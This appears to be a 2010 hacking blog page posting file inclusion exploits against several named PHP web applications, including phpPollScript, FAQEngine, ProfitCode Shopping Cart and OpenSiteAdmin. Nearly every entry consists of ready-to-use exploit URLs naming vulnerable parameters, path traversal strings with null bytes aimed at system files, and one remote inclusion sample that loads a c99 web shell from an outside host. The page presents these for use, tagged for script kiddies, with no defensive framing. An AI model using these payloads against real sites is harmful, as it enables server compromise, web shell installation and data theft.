phpPollScript <= 1.3 Remote File Include Vulnerability
January 16, 2010, 6:41 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
/php/init.poll.php?include_class=
Comments Off
phpAutoMembersArea 3.2.5 ($installed_config_file) Remote File Inclusion
January 16, 2010, 5:41 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
+ PoC:
+ http://[target]/auto_check_renewals.php?installed_config_file=
Comments Off
Develooping Flash Chat (banned_file) Remote File Inclusion
January 16, 2010, 5:39 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Remote File Include :
http://www.target.com/path/chat/adminips.php?banned_file=CmdShell
Comments Off
FAQEngine 4.24.00 – Remote File Inclusion vulnerability [ RFI ]
January 15, 2010, 2:08 pm
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER] |
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]
Comments Off
ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities
January 13, 2010, 10:54 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
- There are Cople of pages that has the LFI vuln
Vuln c0de : dl-authcontent.php |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
$returlvar = "dloads"; |
include "$docroot" . "tplates/usrauthlogin.php"; |
exit; |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Exploit : |
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI] |
Sample : |
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00 |
*************************************************************************************************** |
vuln c0de : dl-maincatsearch-dlcontent.php |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
include("$docroot" . "shopincs/catpgtop$langFile.php"); |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Exploit |
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI] |
Sample |
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00 |
Vuln c0de : dloads-payed.php |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
include "$docroot" . "tplates/usrauthlogin.php"; |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Exploit |
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI] |
Sample |
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00 |
************************************************************************ |
- For Some resons this comeup with a RFI |
Vuln c0de : dloads-header.php |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php"; |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Exploit |
http://server/store/dloads/dloads-header.php?docroot=[RFI] |
Sample |
http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00 |
Comments Off
OpenSiteAdmin 0.9.7b (pageHeader.php path) RFI Vulnerability
January 13, 2010, 10:50 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
[@]=====================================================================================================[@]
[+] 3rr0r Bu9 : - pageHeader.php |
[@]=====================================================================================================[@] |
[@]=====================================================================================================[@] |
[+] 3xpl0it : http://127.0.0.1/OpenSiteAdmin/pages/pageHeader.php?path=[thanks.txt?] |
[@]=====================================================================================================[@]
Comments Off
